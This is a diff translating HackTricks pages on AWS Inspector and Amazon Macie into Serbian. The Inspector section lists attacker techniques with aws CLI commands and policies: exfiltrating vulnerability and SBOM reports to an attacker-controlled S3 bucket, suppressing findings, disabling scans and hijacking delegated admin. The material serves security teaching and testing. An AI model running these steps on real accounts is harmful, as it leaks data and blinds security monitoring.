-#### Software Bill of Materials (SBOM)
+#### Softverski račun o materijalima (SBOM)
 
-A Software Bill of Materials (SBOM) in Amazon Inspector is an exportable nested inventory list detailing all the components within a software package, including libraries and dependencies. SBOMs help provide transparency into the software supply chain, enabling better vulnerability management and compliance. They are crucial for identifying and mitigating risks associated with open source and third-party software components.
+Softverski račun o materijalima (SBOM) u Amazon Inspector je izvoziva ugnježdena lista inventara koja detaljno opisuje sve komponente unutar softverskog paketa, uključujući biblioteke i zavisnosti. SBOM-ovi pomažu u pružanju transparentnosti u lancu snabdevanja softverom, omogućavajući bolje upravljanje ranjivostima i usklađenost. Oni su ključni za identifikaciju i ublažavanje rizika povezanih sa open source i komponentama trećih strana.
 
-### Key features
+### Ključne karakteristike
 
-#### Export findings
+#### Izvoz otkrića
 
-Amazon Inspector offers the capability to export findings to Amazon S3 Buckets, Amazon EventBridge and AWS Security Hub, which enables you to generate detailed reports of identified vulnerabilities and exposures for further analysis or sharing at a specific date and time. This feature supports various output formats such as CSV and JSON, making it easier to integrate with other tools and systems. The export functionality allows customization of the data included in the reports, enabling you to filter findings based on specific criteria like severity, resource type, or date range and including by default all of your findings in the current AWS Region with an Active status.
+Amazon Inspector nudi mogućnost izvoza otkrića u Amazon S3 Buckets, Amazon EventBridge i AWS Security Hub, što vam omogućava da generišete detaljne izveštaje o identifikovanim ranjivostima i izloženostima za dalju analizu ili deljenje na određeni datum i vreme. Ova funkcija podržava različite formate izlaza kao što su CSV i JSON, olakšavajući integraciju sa drugim alatima i sistemima. Funkcionalnost izvoza omogućava prilagođavanje podataka uključenih u izveštaje, omogućavajući vam da filtrirate otkrića na osnovu specifičnih kriterijuma kao što su ozbiljnost, tip resursa ili vremenski opseg, uključujući po defaultu sva vaša otkrića u trenutnoj AWS regiji sa aktivnim statusom.
 
-When exporting findings, a Key Management Service (KMS) key is necessary to encrypt the data during export. KMS keys ensure that the exported findings are protected against unauthorized access, providing an extra layer of security for sensitive vulnerability information.
+Prilikom izvoza otkrića, potrebna je ključna usluga za upravljanje ključevima (KMS) za enkripciju podataka tokom izvoza. KMS ključevi osiguravaju da su izvezena otkrića zaštićena od neovlašćenog pristupa, pružajući dodatni sloj bezbednosti za osetljive informacije o ranjivostima.
 
-#### Amazon EC2 instances scanning
+#### Skeniranje Amazon EC2 instanci
 
-Amazon Inspector offers robust scanning capabilities for Amazon EC2 instances to detect vulnerabilities and security issues. Inspector compared extracted metadata from the EC2 instance against rules from security advisories in order to produce package vulnerabilities and network reachability issues. These scans can be performed through **agent-based** or **agentless** methods, depending on the **scan mode** settings configuration of your account.
+Amazon Inspector nudi robusne mogućnosti skeniranja za Amazon EC2 instance kako bi otkrio ranjivosti i bezbednosne probleme. Inspector upoređuje izvučene metapodatke iz EC2 instance sa pravilima iz bezbednosnih saveta kako bi proizveo ranjivosti paketa i probleme dostupnosti mreže. Ova skeniranja se mogu izvesti putem **agenta** ili **bez agenta**, u zavisnosti od konfiguracije **načina skeniranja** vašeg naloga.
 
-- **Agent-Based**: Utilizes the AWS Systems Manager (SSM) agent to perform in-depth scans. This method allows for comprehensive data collection and analysis directly from the instance.
-- **Agentless**: Provides a lightweight alternative that does not require installing an agent on the instance, creating an EBS snapshot of every volume of the EC2 instance, looking for vulnerabilities, and then deleting it; leveraging existing AWS infrastructure for scanning.
+- **Na bazi agenta**: Koristi AWS Systems Manager (SSM) agenta za izvođenje dubokih skeniranja. Ova metoda omogućava sveobuhvatno prikupljanje i analizu podataka direktno sa instance.
+- **Bez agenta**: Pruža laganu alternativu koja ne zahteva instalaciju agenta na instanci, kreirajući EBS snimak svake jedinice EC2 instance, tražeći ranjivosti, a zatim ga brišući; koristeći postojeću AWS infrastrukturu za skeniranje.
 
-The scan mode determines which method will be used to perform EC2 scans:
+Način skeniranja određuje koja metoda će se koristiti za izvođenje EC2 skeniranja:
 
-- **Agent-Based**: Involves installing the SSM agent on EC2 instances for deep inspection.
-- **Hybrid Scanning**: Combines both agent-based and agentless methods to maximize coverage and minimize performance impact. In those EC2 instances where the SSM agent is installed, Inspector will perform an agent-based scan, and for those where there is no SSM agent, the scan performed will be agentless.
+- **Na bazi agenta**: Uključuje instalaciju SSM agenta na EC2 instancama za duboku inspekciju.
+- **Hibridno skeniranje**: Kombinuje metode na bazi agenta i bez agenta kako bi maksimizirao pokrivenost i minimizirao uticaj na performanse. Na onim EC2 instancama gde je instaliran SSM agent, Inspector će izvesti skeniranje na bazi agenta, a za one gde nema SSM agenta, skeniranje će biti bez agenta.
 
-Another important feature is the **deep inspection** for EC2 Linux instances. This feature offers thorough analysis of the software and configuration of EC2 Linux instances, providing detailed vulnerability assessments, including operating system vulnerabilities, application vulnerabilities, and misconfigurations, ensuring a comprehensive security evaluation. This is achieved through the inspection of **custom paths** and all of its sub-directories. By default, Amazon Inspector will scan the following, but each member account can define up to 5 more custom paths, and each delegated administrator up to 10:
+Još jedna važna karakteristika je **duboka inspekcija** za EC2 Linux instance. Ova funkcija nudi temeljnu analizu softvera i konfiguracije EC2 Linux instanci, pružajući detaljne procene ranjivosti, uključujući ranjivosti operativnog sistema, ranjivosti aplikacija i pogrešne konfiguracije, osiguravajući sveobuhvatnu bezbednosnu evaluaciju. Ovo se postiže inspekcijom **prilagođenih putanja** i svih njihovih poddirektorijuma. Po defaultu, Amazon Inspector će skenirati sledeće, ali svaki član naloga može definisati do 5 dodatnih prilagođenih putanja, a svaki delegirani administrator do 10:
 
 - `/usr/lib`
 - `/usr/lib64`
 - `/usr/local/lib`
 - `/usr/local/lib64`
 
-#### Amazon ECR container images scanning
+#### Skeniranje slika kontejnera Amazon ECR
 
-Amazon Inspector provides robust scanning capabilities for Amazon Elastic Container Registry (ECR) container images, ensuring that package vulnerabilities are detected and managed efficiently.
+Amazon Inspector pruža robusne mogućnosti skeniranja za slike kontejnera Amazon Elastic Container Registry (ECR), osiguravajući da se ranjivosti paketa otkriju i efikasno upravljaju.
 
-- **Basic Scanning**: This is a quick and lightweight scan that identifies known OS packages vulnerabilities in container images using a standard set of rules from the open-source Clair project. With this scanning configuration, your repositories will be scanned on push, or performing manual scans.
-- **Enhanced Scanning**: This option adds the continuous scanning feature in addition to the on push scan. Enhanced scanning dives deeper into the layers of each container image to identify vulnerabilities in OS packages and in programming languages packages with higher accuracy. It analyzes both the base image and any additional layers, providing a comprehensive view of potential security issues.
+- **Osnovno skeniranje**: Ovo je brzo i lagano skeniranje koje identifikuje poznate ranjivosti OS paketa u slikama kontejnera koristeći standardni set pravila iz open-source Clair projekta. Sa ovom konfiguracijom skeniranja, vaši repozitorijumi će biti skenirani prilikom slanja, ili izvođenjem ručnih skeniranja.
+- **Poboljšano skeniranje**: Ova opcija dodaje funkciju kontinuiranog skeniranja pored skeniranja prilikom slanja. Poboljšano skeniranje dublje analizira slojeve svake slike kontejnera kako bi identifikovalo ranjivosti u OS paketima i paketima programskih jezika sa većom tačnošću. Analizira i osnovnu sliku i sve dodatne slojeve, pružajući sveobuhvatan pregled potencijalnih bezbednosnih problema.
 
-#### Amazon Lambda functions scanning
+#### Skeniranje AWS Lambda funkcija
 
-Amazon Inspector includes comprehensive scanning capabilities for AWS Lambda functions and its layers, ensuring the security and integrity of serverless applications. Inspector offers two types of scanning for Lambda functions:
+Amazon Inspector uključuje sveobuhvatne mogućnosti skeniranja za AWS Lambda funkcije i njihove slojeve, osiguravajući bezbednost i integritet serverless aplikacija. Inspector nudi dve vrste skeniranja za Lambda funkcije:
 
-- **Lambda standard scanning**: This default feature identifies software vulnerabilities in the application package dependencies added to your Lambda function and layers. For instance, if your function uses a version of a library like python-jwt with a known vulnerability, it generates a finding.
-- **Lambda code scanning**: Analyzes custom application code for security issues, detecting vulnerabilities like injection flaws, data leaks, weak cryptography, and missing encryption. It captures code snippets highlighting detected vulnerabilities, such as hardcoded credentials. Findings include detailed remediation suggestions and code snippets for fixing the issues.
+- **Standardno skeniranje Lambda**: Ova podrazumevana funkcija identifikuje softverske ranjivosti u zavisnostima paketa aplikacije dodatim vašoj Lambda funkciji i slojevima. Na primer, ako vaša funkcija koristi verziju biblioteke kao što je python-jwt sa poznatom ranjivošću, generiše otkriće.
+- **Skeniranje koda Lambda**: Analizira prilagođeni kod aplikacije za bezbednosne probleme, otkrivajući ranjivosti kao što su greške u injekciji, curenje podataka, slaba kriptografija i nedostatak enkripcije. Zapisuje delove koda koji ističu otkrivene ranjivosti, kao što su hardkodovane akreditive. Otkrića uključuju detaljne preporuke za otklanjanje i delove koda za ispravljanje problema.
 
-#### **Center for Internet Security (CIS) scans**
+#### **Skeniranja Centra za internet bezbednost (CIS)**
 
-Amazon Inspector includes CIS scans to benchmark Amazon EC2 instance operating systems against best practice recommendations from the Center for Internet Security (CIS). These scans ensure configurations adhere to industry-standard security baselines.
+Amazon Inspector uključuje CIS skeniranja kako bi uporedio operativne sisteme Amazon EC2 instanci sa preporukama najboljih praksi iz Centra za internet bezbednost (CIS). Ova skeniranja osiguravaju da konfiguracije odgovaraju industrijskim standardima bezbednosti.
 
-- **Configuration**: CIS scans evaluate if system configurations meet specific CIS Benchmark recommendations, with each check linked to a CIS check ID and title.
-- **Execution**: Scans are performed or scheduled based on instance tags and defined schedules.
-- **Results**: Post-scan results indicate which checks passed, skipped, or failed, providing insight into the security posture of each instance.
-
-### Enumeration
+- **Konfiguracija**: CIS skeniranja procenjuju da li sistemske konfiguracije ispunjavaju specifične preporuke CIS Benchmark-a, pri čemu je svaka provera povezana sa CIS ID-om provere i naslovom.
+- **Izvršenje**: Skeniranja se izvode ili zakazuju na osnovu oznaka instanci i definisanih rasporeda.
+- **Rezultati**: Rezultati nakon skeniranja ukazuju na to koje su provere prošle, preskočene ili pale, pružajući uvid u bezbednosnu poziciju svake instance.
 
+### Enumeracija
 ```bash
 # Administrator and member accounts #
 
@@ -111,7 +110,7 @@ aws inspector2 list-findings
 aws inspector2 batch-get-finding-details --finding-arns 
 ## List statistical and aggregated finding data (ReadOnlyAccess policy is enough for this)
 aws inspector2 list-finding-aggregations --aggregation-type  [--account-ids ]
+| ACCOUNT AWS_LAMBDA_FUNCTION | LAMBDA_LAYER> [--account-ids ]
 ## Retrieve code snippet information about one or more specified code vulnerability findings
 aws inspector2 batch-get-code-snippet --finding-arns 
 ## Retrieve the status for the specified findings report (ReadOnlyAccess policy is enough for this)
@@ -183,113 +182,99 @@ aws inspector list-exclusions --assessment-run-arn 
 ## Rule packages
 aws inspector list-rules-packages
 ```
-
-### Post Exploitation
+### Post Exploatacija
 
 > [!TIP]
-> From an attackers perspective, this service can help the attacker to find vulnerabilities and network exposures that could help him to compromise other instances/containers.
+> Iz perspektive napadača, ova usluga može pomoći napadaču da pronađe ranjivosti i mrežne izloženosti koje bi mu mogle pomoći da kompromituje druge instance/kontejnere.
 >
-> However, an attacker could also be interested in disrupting this service so the victim cannot see vulnerabilities (all or specific ones).
+> Međutim, napadač bi takođe mogao biti zainteresovan za ometanje ove usluge kako žrtva ne bi mogla da vidi ranjivosti (sve ili specifične).
 
 #### `inspector2:CreateFindingsReport`, `inspector2:CreateSBOMReport`
 
-An attacker could generate detailed reports of vulnerabilities or software bill of materials (SBOMs) and exfiltrate them from your AWS environment. This information could be exploited to identify specific weaknesses, outdated software, or insecure dependencies, enabling targeted attacks.
-
+Napadač bi mogao generisati detaljne izveštaje o ranjivostima ili softverskom računu materijala (SBOM) i eksfiltrirati ih iz vašeg AWS okruženja. Ove informacije bi mogle biti iskorišćene za identifikaciju specifičnih slabosti, zastarelog softvera ili nesigurnih zavisnosti, omogućavajući ciljana napada.
 ```bash
 # Findings report
 aws inspector2 create-findings-report --report-format  --s3-destination  [--filter-criteria ]
 # SBOM report
 aws inspector2 create-sbom-report --report-format  --s3-destination  [--resource-filter-criteria ]
 ```
-
-The following example shows how to exfiltrate all the Active findings from Amazon Inspector to an attacker controlled Amazon S3 Bucket with an attacker controlled Amazon KMS key:
-
-1. **Create an Amazon S3 Bucket** and attach a policy to it in order to be accessible from the victim Amazon Inspector:
-
+1. **Kreirajte Amazon S3 Bucket** i prikačite politiku na njega kako bi bio dostupan iz žrtvinog Amazon Inspectora:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Sid": "allow-inspector",
-      "Effect": "Allow",
-      "Principal": {
-        "Service": "inspector2.amazonaws.com"
-      },
-      "Action": ["s3:PutObject", "s3:PutObjectAcl", "s3:AbortMultipartUpload"],
-      "Resource": "arn:aws:s3:::inspector-findings/*",
-      "Condition": {
-        "StringEquals": {
-          "aws:SourceAccount": ""
-        },
-        "ArnLike": {
-          "aws:SourceArn": "arn:aws:inspector2:us-east-1::report/*"
-        }
-      }
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Sid": "allow-inspector",
+"Effect": "Allow",
+"Principal": {
+"Service": "inspector2.amazonaws.com"
+},
+"Action": ["s3:PutObject", "s3:PutObjectAcl", "s3:AbortMultipartUpload"],
+"Resource": "arn:aws:s3:::inspector-findings/*",
+"Condition": {
+"StringEquals": {
+"aws:SourceAccount": ""
+},
+"ArnLike": {
+"aws:SourceArn": "arn:aws:inspector2:us-east-1::report/*"
+}
+}
+}
+]
 }
 ```
-
-2. **Create an Amazon KMS key** and attach a policy to it in order to be usable by the victim’s Amazon Inspector:
-
+2. **Kreirajte Amazon KMS ključ** i prikačite politiku na njega kako bi bio upotrebljiv od strane žrtvinog Amazon Inspectora:
 ```json
 {
-    "Version": "2012-10-17",
-    "Id": "key-policy",
-    "Statement": [
-        {
-	    ...
-        },
-        {
-            "Sid": "Allow victim Amazon Inspector to use the key",
-            "Effect": "Allow",
-            "Principal": {
-                "Service": "inspector2.amazonaws.com"
-            },
-            "Action": [
-                "kms:Encrypt",
-                "kms:Decrypt",
-                "kms:ReEncrypt*",
-                "kms:GenerateDataKey*",
-                "kms:DescribeKey"
-            ],
-            "Resource": "*",
-            "Condition": {
-                "StringEquals": {
-                    "aws:SourceAccount": ""
-                }
-            }
-        }
-    ]
+"Version": "2012-10-17",
+"Id": "key-policy",
+"Statement": [
+{
+...
+},
+{
+"Sid": "Allow victim Amazon Inspector to use the key",
+"Effect": "Allow",
+"Principal": {
+"Service": "inspector2.amazonaws.com"
+},
+"Action": [
+"kms:Encrypt",
+"kms:Decrypt",
+"kms:ReEncrypt*",
+"kms:GenerateDataKey*",
+"kms:DescribeKey"
+],
+"Resource": "*",
+"Condition": {
+"StringEquals": {
+"aws:SourceAccount": ""
+}
+}
+}
+]
 }
 ```
-
-3. Execute the command to **create the findings report** exfiltrating it:
-
+3. Izvršite komandu za **kreiranje izveštaja o nalazima** eksfiltrirajući ga:
 ```bash
 aws --region us-east-1 inspector2 create-findings-report --report-format CSV --s3-destination bucketName=,keyPrefix=exfiltration_,kmsKeyArn=arn:aws:kms:us-east-1:123456789012:key/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f
 ```
-
-- **Potential Impact**: Generation and exfiltration of detailed vulnerability and software reports, gaining insights into specific vulnerabilities and security weaknesses.
+- **Potencijalni Uticaj**: Generisanje i eksfiltracija detaljnih izveštaja o ranjivostima i softveru, sticanje uvida u specifične ranjivosti i bezbednosne slabosti.
 
 #### `inspector2:CancelFindingsReport`, `inspector2:CancelSbomExport`
 
-An attacker could cancel the generation of the specified findings report or SBOM report, preventing security teams from receiving timely information about vulnerabilities and software bill of materials (SBOMs), delaying the detection and remediation of security issues.
-
+Napadač bi mogao da otkaže generisanje navedenog izveštaja o nalazima ili SBOM izveštaja, sprečavajući bezbednosne timove da dobiju pravovremene informacije o ranjivostima i softverskom računu materijala (SBOM), odlažući otkrivanje i otklanjanje bezbednosnih problema.
 ```bash
 # Cancel findings report generation
 aws inspector2 cancel-findings-report --report-id 
 # Cancel SBOM report generatiom
 aws inspector2 cancel-sbom-export --report-id 
 ```
-
-- **Potential Impact**: Disruption of security monitoring and prevention of timely detection and remediation of security issues.
+- **Potencijalni Uticaj**: Poremećaj u praćenju bezbednosti i sprečavanje pravovremenog otkrivanja i otklanjanja bezbednosnih problema.
 
 #### `inspector2:CreateFilter`, `inspector2:UpdateFilter`, `inspector2:DeleteFilter`
 
-An attacker with these permissions would be able manipulate the filtering rules that determine which vulnerabilities and security issues are reported or suppressed (if the **action** is set to SUPPRESS, a suppression rule would be created). This could hide critical vulnerabilities from security administrators, making it easier to exploit these weaknesses without detection. By altering or removing important filters, an attacker could also create noise by flooding the system with irrelevant findings, hindering effective security monitoring and response.
-
+Napadač sa ovim dozvolama mogao bi da manipuliše pravilima filtriranja koja određuju koje ranjivosti i bezbednosni problemi se prijavljuju ili potiskuju (ako je **akcija** postavljena na SUPPRESS, biće kreirano pravilo za potiskivanje). Ovo bi moglo sakriti kritične ranjivosti od bezbednosnih administratora, olakšavajući iskorišćavanje ovih slabosti bez otkrivanja. Menjanjem ili uklanjanjem važnih filtera, napadač bi takođe mogao da stvori šum preplavljujući sistem nevažnim nalazima, ometajući efikasno praćenje i odgovor na bezbednosne pretnje.
 ```bash
 # Create
 aws inspector2 create-filter --action  --filter-criteria  --name  [--reason ]
@@ -298,93 +283,78 @@ aws inspector2 update-filter --filter-arn  [--action ] [
 # Delete
 aws inspector2 delete-filter --arn 
 ```
-
-- **Potential Impact**: Concealment or suppression of critical vulnerabilities, or flooding the system with irrelevant findings.
+- **Potencijalni Uticaj**: Sakrivanje ili suzbijanje kritičnih ranjivosti, ili preplavljivanje sistema nevažnim nalazima.
 
 #### `inspector2:DisableDelegatedAdminAccount`, (`inspector2:EnableDelegatedAdminAccount` & `organizations:ListDelegatedAdministrators` & `organizations:EnableAWSServiceAccess` & `iam:CreateServiceLinkedRole`)
 
-An attacker could significantly disrupt the security management structure.
+Napadač bi mogao značajno da ometa strukturu upravljanja bezbednošću.
 
-- Disabling the delegated admin account, the attacker could prevent the security team from accessing and managing Amazon Inspector settings and reports.
-- Enabling an unauthorized admin account would allow an attacker to control security configurations, potentially disabling scans or modifying settings to hide malicious activities.
+- Onemogućavanjem delegiranog administratorskog naloga, napadač bi mogao sprečiti bezbednosni tim da pristupi i upravlja podešavanjima i izveštajima Amazon Inspectora.
+- Omogućavanje neovlašćenog administratorskog naloga omogućilo bi napadaču da kontroliše bezbednosne konfiguracije, potencijalno onemogućavajući skeniranja ili menjajući podešavanja kako bi sakrio zlonamerne aktivnosti.
 
 > [!WARNING]
-> It is required for the unauthorized account to be in the same Organization as the victim in order to become the delegated administrator.
+> Neovlašćeni nalog mora biti u istoj Organizaciji kao žrtva da bi postao delegirani administrator.
 >
-> In order for the unauthorized account to become the delegated administrator, it is also required that after the legitimate delegated administrator is disabled, and before the unauthorized account is enabled as the delegated administrator, the legitimate administrator must be deregistered as the delegated administrator from the organization. . This can be done with the following command (**`organizations:DeregisterDelegatedAdministrator`** permission required): **`aws organizations deregister-delegated-administrator --account-id  --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/)`**
-
+> Da bi neovlašćeni nalog postao delegirani administrator, takođe je potrebno da nakon što je legitimni delegirani administrator onemogućen, i pre nego što se neovlašćeni nalog omogući kao delegirani administrator, legitimni administrator mora biti deregistrovan kao delegirani administrator iz organizacije. Ovo se može uraditi sledećom komandom (**`organizations:DeregisterDelegatedAdministrator`** dozvola potrebna): **`aws organizations deregister-delegated-administrator --account-id  --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/)`**
 ```bash
 # Disable
 aws inspector2 disable-delegated-admin-account --delegated-admin-account-id 
 # Enable
 aws inspector2 enable-delegated-admin-account --delegated-admin-account-id 
 ```
-
-- **Potential Impact**: Disruption of the security management.
+- **Potencijalni Uticaj**: Poremećaj u upravljanju bezbednošću.
 
 #### `inspector2:AssociateMember`, `inspector2:DisassociateMember`
 
-An attacker could manipulate the association of member accounts within an Amazon Inspector organization. By associating unauthorized accounts or disassociating legitimate ones, an attacker could control which accounts are included in security scans and reporting. This could lead to critical accounts being excluded from security monitoring, enabling the attacker to exploit vulnerabilities in those accounts without detection.
+Napadač bi mogao da manipuliše asocijacijom članova unutar Amazon Inspector organizacije. Povezivanjem neovlašćenih naloga ili odspajanjem legitimnih, napadač bi mogao da kontroliše koji nalozi su uključeni u bezbednosne skenove i izveštavanje. To bi moglo dovesti do isključenja kritičnih naloga iz bezbednosnog nadzora, omogućavajući napadaču da iskoristi ranjivosti u tim nalozima bez otkrivanja.
 
 > [!WARNING]
-> This action requires to be performed by the delegated administrator.
-
+> Ova akcija zahteva da je izvrši delegirani administrator.
 ```bash
 # Associate
 aws inspector2 associate-member --account-id 
 # Disassociate
 aws inspector2 disassociate-member --account-id 
 ```
-
-- **Potential Impact**: Exclusion of key accounts from security scans, enabling undetected exploitation of vulnerabilities.
+- **Potencijalni Uticaj**: Isključenje ključnih naloga iz bezbednosnih skeniranja, omogućavajući neotkrivenu eksploataciju ranjivosti.
 
 #### `inspector2:Disable`, (`inspector2:Enable` & `iam:CreateServiceLinkedRole`)
 
-An attacker with the `inspector2:Disable` permission would be able to disable security scans on specific resource types (EC2, ECR, Lambda, Lambda code) over the specified accounts, leaving parts of the AWS environment unmonitored and vulnerable to attacks. In addition, owing the **`inspector2:Enable`** & **`iam:CreateServiceLinkedRole`** permissions, an attacker could then re-enable scans selectively to avoid detection of suspicious configurations.
+Napadač sa dozvolom `inspector2:Disable` mogao bi da onemogući bezbednosna skeniranja na specifičnim tipovima resursa (EC2, ECR, Lambda, Lambda kod) na navedenim nalozima, ostavljajući delove AWS okruženja neproverene i ranjive na napade. Pored toga, zahvaljujući dozvolama **`inspector2:Enable`** & **`iam:CreateServiceLinkedRole`**, napadač bi mogao da ponovo omogući skeniranja selektivno kako bi izbegao otkrivanje sumnjivih konfiguracija.
 
 > [!WARNING]
-> This action requires to be performed by the delegated administrator.
-
+> Ova akcija zahteva da je izvrši delegirani administrator.
 ```bash
 # Disable
 aws inspector2 disable --account-ids  [--resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}>]
 # Enable
 aws inspector2 enable --resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}> [--account-ids ]
 ```
-
-- **Potential Impact**: Creation of blind spots in the security monitoring.
+- **Potencijalni Uticaj**: Kreiranje slepih tačaka u bezbednosnom nadzoru.
 
 #### `inspector2:UpdateOrganizationConfiguration`
 
-An attacker with this permission would be able to update the configurations for your Amazon Inspector organization, affecting the default scanning features enabled for new member accounts.
+Napadač sa ovom dozvolom bi mogao da ažurira konfiguracije za vašu Amazon Inspector organizaciju, utičući na podrazumevane funkcije skeniranja omogućene za nove članove naloga.
 
 > [!WARNING]
-> This action requires to be performed by the delegated administrator.
-
+> Ova akcija zahteva da je izvrši delegirani administrator.
 ```bash
 aws inspector2 update-organization-configuration --auto-enable 
 ```
-
-- **Potential Impact**: Alter security scan policies and configurations for the organization.
+- **Potencijalni Uticaj**: Izmeniti politike i konfiguracije bezbednosnog skeniranja za organizaciju.
 
 #### `inspector2:TagResource`, `inspector2:UntagResource`
 
-An attacker could manipulate tags on AWS Inspector resources, which are critical for organizing, tracking, and automating security assessments. By altering or removing tags, an attacker could potentially hide vulnerabilities from security scans, disrupt compliance reporting, and interfere with automated remediation processes, leading to unchecked security issues and compromised system integrity.
-
+Napadač bi mogao da manipuliše oznakama na AWS Inspector resursima, koje su ključne za organizovanje, praćenje i automatizaciju bezbednosnih procena. Izmenom ili uklanjanjem oznaka, napadač bi potencijalno mogao da sakrije ranjivosti od bezbednosnih skeniranja, ometa izveštavanje o usklađenosti i ometa procese automatizovane ispravke, što dovodi do neproverenih bezbednosnih problema i kompromitovane integriteta sistema.
 ```bash
 aws inspector2 tag-resource --resource-arn  --tags 
 aws inspector2 untag-resource --resource-arn  --tag-keys 
 ```
+- **Potencijalni Uticaj**: Sakrivanje ranjivosti, prekid izveštavanja o usklađenosti, prekid automatizacije bezbednosti i prekid alokacije troškova.
 
-- **Potential Impact**: Hiding of vulnerabilities, disruption of compliance reporting, disruption of security automation and disruption of cost allocation.
-
-## References
+## Reference
 
 - [https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html](https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html)
 - [https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md
index e6e3a2281..53ae159e4 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md
@@ -6,70 +6,69 @@
 
 ## Macie
 
-Amazon Macie stands out as a service designed to **automatically detect, classify, and identify data** within an AWS account. It leverages **machine learning** to continuously monitor and analyze data, primarily focusing on detecting and alerting against unusual or suspicious activities by examining **cloud trail event** data and user behavior patterns.
+Amazon Macie se izdvaja kao usluga koja je dizajnirana da **automatski otkriva, klasifikuje i identifikuje podatke** unutar AWS naloga. Koristi **mašinsko učenje** za kontinuirano praćenje i analizu podataka, fokusirajući se prvenstveno na otkrivanje i upozoravanje na neobične ili sumnjive aktivnosti ispitivanjem **cloud trail event** podataka i obrazaca ponašanja korisnika.
 
-Key Features of Amazon Macie:
+Ključne karakteristike Amazon Macie:
 
-1. **Active Data Review**: Employs machine learning to review data actively as various actions occur within the AWS account.
-2. **Anomaly Detection**: Identifies irregular activities or access patterns, generating alerts to mitigate potential data exposure risks.
-3. **Continuous Monitoring**: Automatically monitors and detects new data in Amazon S3, employing machine learning and artificial intelligence to adapt to data access patterns over time.
-4. **Data Classification with NLP**: Utilizes natural language processing (NLP) to classify and interpret different data types, assigning risk scores to prioritize findings.
-5. **Security Monitoring**: Identifies security-sensitive data, including API keys, secret keys, and personal information, helping to prevent data leaks.
+1. **Aktivna revizija podataka**: Koristi mašinsko učenje za aktivnu reviziju podataka dok se različite radnje dešavaju unutar AWS naloga.
+2. **Otkrivanje anomalija**: Identifikuje nepravilne aktivnosti ili obrasce pristupa, generišući upozorenja kako bi se smanjili potencijalni rizici od izlaganja podataka.
+3. **Kontinuirano praćenje**: Automatski prati i otkriva nove podatke u Amazon S3, koristeći mašinsko učenje i veštačku inteligenciju kako bi se prilagodio obrascima pristupa podacima tokom vremena.
+4. **Klasifikacija podataka uz NLP**: Koristi obradu prirodnog jezika (NLP) za klasifikaciju i tumačenje različitih tipova podataka, dodeljujući rizik ocene kako bi se prioritizovali nalazi.
+5. **Praćenje bezbednosti**: Identifikuje podatke o bezbednosti, uključujući API ključeve, tajne ključeve i lične informacije, pomažući u sprečavanju curenja podataka.
 
-Amazon Macie is a **regional service** and requires the 'AWSMacieServiceCustomerSetupRole' IAM Role and an enabled AWS CloudTrail for functionality.
+Amazon Macie je **regionalna usluga** i zahteva 'AWSMacieServiceCustomerSetupRole' IAM ulogu i omogućeni AWS CloudTrail za funkcionalnost.
 
 ### Alert System
 
-Macie categorizes alerts into predefined categories like:
+Macie kategorizuje upozorenja u unapred definisane kategorije kao što su:
 
-- Anonymized access
-- Data compliance
-- Credential Loss
-- Privilege escalation
+- Anonimizovani pristup
+- Usklađenost podataka
+- Gubitak kredencijala
+- Eskalacija privilegija
 - Ransomware
-- Suspicious access, etc.
+- Sumnjiv pristup, itd.
 
-These alerts provide detailed descriptions and result breakdowns for effective response and resolution.
+Ova upozorenja pružaju detaljne opise i analize rezultata za efikasan odgovor i rešavanje.
 
 ### Dashboard Features
 
-The dashboard categorizes data into various sections, including:
+Kontrolna tabla kategorizuje podatke u različite sekcije, uključujući:
 
-- S3 Objects (by time range, ACL, PII)
-- High-risk CloudTrail events/users
-- Activity Locations
-- CloudTrail user identity types, and more.
+- S3 objekti (po vremenskom opsegu, ACL, PII)
+- Visoko rizični CloudTrail događaji/korisnici
+- Lokacije aktivnosti
+- Tipovi identiteta CloudTrail korisnika, i više.
 
 ### User Categorization
 
-Users are classified into tiers based on the risk level of their API calls:
+Korisnici su klasifikovani u nivoe na osnovu nivoa rizika njihovih API poziva:
 
-- **Platinum**: High-risk API calls, often with admin privileges.
-- **Gold**: Infrastructure-related API calls.
-- **Silver**: Medium-risk API calls.
-- **Bronze**: Low-risk API calls.
+- **Platinum**: Visoko rizični API pozivi, često sa administratorskim privilegijama.
+- **Gold**: API pozivi vezani za infrastrukturu.
+- **Silver**: Srednje rizični API pozivi.
+- **Bronze**: Nisko rizični API pozivi.
 
 ### Identity Types
 
-Identity types include Root, IAM user, Assumed Role, Federated User, AWS Account, and AWS Service, indicating the source of requests.
+Tipovi identiteta uključuju Root, IAM korisnika, Pretpostavljenu ulogu, Federisanog korisnika, AWS nalog i AWS uslugu, ukazujući na izvor zahteva.
 
 ### Data Classification
 
-Data classification encompasses:
+Klasifikacija podataka obuhvata:
 
-- Content-Type: Based on detected content type.
-- File Extension: Based on file extension.
-- Theme: Categorized by keywords within files.
-- Regex: Categorized based on specific regex patterns.
+- Content-Type: Na osnovu otkrivenog tipa sadržaja.
+- File Extension: Na osnovu ekstenzije datoteke.
+- Theme: Kategorizovano prema ključnim rečima unutar datoteka.
+- Regex: Kategorizovano na osnovu specifičnih regex obrazaca.
 
-The highest risk among these categories determines the file's final risk level.
+Najveći rizik među ovim kategorijama određuje konačni nivo rizika datoteke.
 
 ### Research and Analysis
 
-Amazon Macie's research function allows for custom queries across all Macie data for in-depth analysis. Filters include CloudTrail Data, S3 Bucket properties, and S3 Objects. Moreover, it supports inviting other accounts to share Amazon Macie, facilitating collaborative data management and security monitoring.
